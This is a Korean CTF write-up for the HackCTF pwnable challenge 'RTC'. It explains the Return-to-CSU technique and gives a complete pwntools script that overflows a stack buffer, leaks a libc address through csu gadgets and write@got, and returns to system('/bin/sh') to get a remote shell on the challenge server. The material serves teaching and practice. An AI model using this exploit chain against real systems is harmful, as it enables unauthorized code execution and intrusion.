[HackCTF : Pwnable] RTC 풀이 (64bit, RTC)

문제 풀이 환경 : ubuntu 18.04 사용 툴 : IDA 7.5 pro

인텐 풀이.

---

주어진 파일은 문제파일 바이너리 and libc

 

Analysis

jiravvit.tistory.com/entry/HackCTF-Pwnable-RTC-%ED%92%80%EC%9D%B4-64bit-ROP

[HackCTF : Pwnable] RTC 풀이 (64bit, ROP)

How to exploit

RTC 기법 사용

jiravvit.tistory.com/entry/RTC-Return-to-CSU

RTC (Return to CSU) (수정)

 

Let's exploit

gadget_2를 leak하는데만 써서 add rsp, 8부터 안하고 그 다음부터 pop하는 곳부터 주소를 넣어줬다.

gadget_2 -> csu_init
gadget_1 -> csu_call

라고 생각하면 이해가 더 쉬울 듯 하다..

from pwn import *

#p = process('./rtc')
p = remote('ctf.j0n9hyun.xyz', 3025)
e = ELF('./rtc')
#libc = e.libc
libc = ELF('./libc.so.6')

write_plt = e.plt['write']
write_got = e.got['write']
read_plt = e.plt['read']
read_got = e.got['read']
main = 0x4005f6
bss = e.bss()
binsh = '/bin/sh\x00'
pop_rdi = 0x4006c3
gadget_1 = 0x4006ba #  pop rbx,rbp,r12,r13,r14,r15, ret;
gadget_2 = 0x4006a0 #  mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+8*rbx]; 
                    # add rbx,1; cmp rbx,rbp

# write(1, write_got, len(write_got))
payload = ''
payload += 'a' * (0x40+0x8)
payload += p64(gadget_1)
payload += p64(0)           # rbx
payload += p64(1)           # rbp
payload += p64(write_got)   # r12, no plt ok got
payload += p64(8) + p64(read_got) + p64(1) # r13(rdx), r14(rsi), r15(edi)
payload += p64(gadget_2)    
# reply
# return to main
payload += p64(0) * 7
payload += p64(main)

pause()
p.sendlineafter('\n', payload)

read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
#read_addr = u64(p.recv(8))
print hex(read_addr)

libc_base = read_addr - libc.symbols['read']
print hex(libc_base)

system = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()

payload = ''
payload += 'a' * (0x40+0x8)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(0x400491)  # ret
payload += p64(system)

p.sendlineafter('\n', payload)

p.interactive()